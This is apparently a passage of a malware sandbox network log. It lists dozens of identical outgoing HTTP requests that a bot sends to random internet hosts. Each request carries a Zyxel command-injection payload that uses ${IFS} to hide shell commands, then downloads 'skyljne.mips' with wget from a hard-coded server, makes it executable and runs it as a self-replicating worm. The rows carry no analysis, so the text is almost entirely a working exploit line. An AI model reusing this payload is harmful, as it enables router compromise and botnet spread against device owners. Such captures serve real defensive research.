                                            Jan 14, 2024 15:50:55.737668037 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8589192.168.2.234383083.195.76.97443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:55.737699986 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8590192.168.2.234081290.229.32.99443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:55.737728119 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8591192.168.2.234849423.162.15.28443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:55.737781048 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8592192.168.2.2353590170.168.109.100443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:55.737812996 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8593192.168.2.2354530137.119.78.8443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:55.737845898 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8594192.168.2.23581049.84.233.148443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:55.737869978 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8595192.168.2.2337276108.222.225.15443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:55.737931967 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8596192.168.2.2353448213.206.53.10443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:55.737962961 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8597192.168.2.2340276181.33.208.152443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:55.737991095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8598192.168.2.234457299.251.14.10443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:55.738070011 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8599192.168.2.2341246169.164.84.75443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:55.738100052 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8600192.168.2.2359366199.137.1.41443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:55.738162041 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8601192.168.2.2350826219.218.67.226443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:55.738184929 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8602192.168.2.233875895.193.121.20443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:55.738270998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8603192.168.2.2353036193.228.41.242443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:55.738298893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8604192.168.2.235597017.187.234.76443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:55.738343000 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8605192.168.2.2340476161.9.124.119443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:55.738396883 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8606192.168.2.233459239.216.213.29443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:55.738442898 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8607192.168.2.2343840135.215.132.7443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:55.738481045 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8608192.168.2.235587231.97.15.102443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:55.738532066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8609192.168.2.233378827.214.218.226443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:55.738557100 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8610192.168.2.234564066.128.225.153443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:55.738604069 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8611192.168.2.235075661.108.185.25443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:55.738627911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8612192.168.2.233312859.152.228.196443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:55.738672972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8613192.168.2.2347618115.255.67.69443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:55.738730907 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8614192.168.2.2359964184.11.44.150443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:55.738773108 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8615192.168.2.2354740171.66.18.133443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:55.738840103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8616192.168.2.2347668152.43.188.205443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:55.738863945 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8617192.168.2.2333410166.216.254.207443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:55.738926888 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8618192.168.2.2355158106.94.35.73443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:55.738991022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8619192.168.2.234387486.186.232.128443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:55.739017010 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8620192.168.2.2337256203.88.83.18443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:55.739058971 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8621192.168.2.2337328148.240.57.28443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:55.739129066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8622192.168.2.234506063.54.48.224443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:55.739162922 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8623192.168.2.235242634.219.109.87443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:55.739223003 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8624192.168.2.235694686.196.222.4443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:55.739257097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8625192.168.2.2345264103.249.203.208443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:55.739289999 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8626192.168.2.2355052198.246.50.196443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:55.739306927 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8627192.168.2.2352670197.245.255.126443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:55.739339113 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8628192.168.2.235696817.108.42.27443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:55.739418983 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8629192.168.2.2341848120.63.121.9443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:55.739459991 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8630192.168.2.2348752145.245.153.133443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:55.739487886 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8631192.168.2.2352278202.0.104.192443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:55.739532948 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8632192.168.2.2348296139.203.178.11443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:55.739571095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8633192.168.2.233381861.8.93.117443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:55.739626884 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8634192.168.2.2356514167.149.95.197443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:55.739649057 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8635192.168.2.2347828197.177.140.203443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:55.739702940 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8636192.168.2.2341820205.135.201.158443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:55.739753962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8637192.168.2.2346330171.147.116.195443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:55.739801884 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8638192.168.2.2334548218.227.47.160443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:55.739869118 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8639192.168.2.235499690.163.34.101443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:55.739895105 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8640192.168.2.2354246188.171.113.50443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:55.739936113 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8641192.168.2.2352014124.87.227.191443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:55.739963055 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8642192.168.2.2339406185.65.234.224443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:55.739983082 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8643192.168.2.2360580141.23.171.70443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:55.740000963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8644192.168.2.2333180181.254.246.119443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:55.740050077 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8645192.168.2.2343620179.219.183.146443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:55.740081072 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8646192.168.2.2339708179.201.3.60443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:55.740118980 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8647192.168.2.2336610117.61.7.206443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:55.740166903 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8648192.168.2.2336864217.136.207.113443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:55.740184069 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8649192.168.2.2336998103.41.62.76443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:55.740250111 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8650192.168.2.2344250145.145.103.150443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:55.740302086 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8651192.168.2.2351260104.6.4.125443
                                            TimestampBytes transferredDirectionData
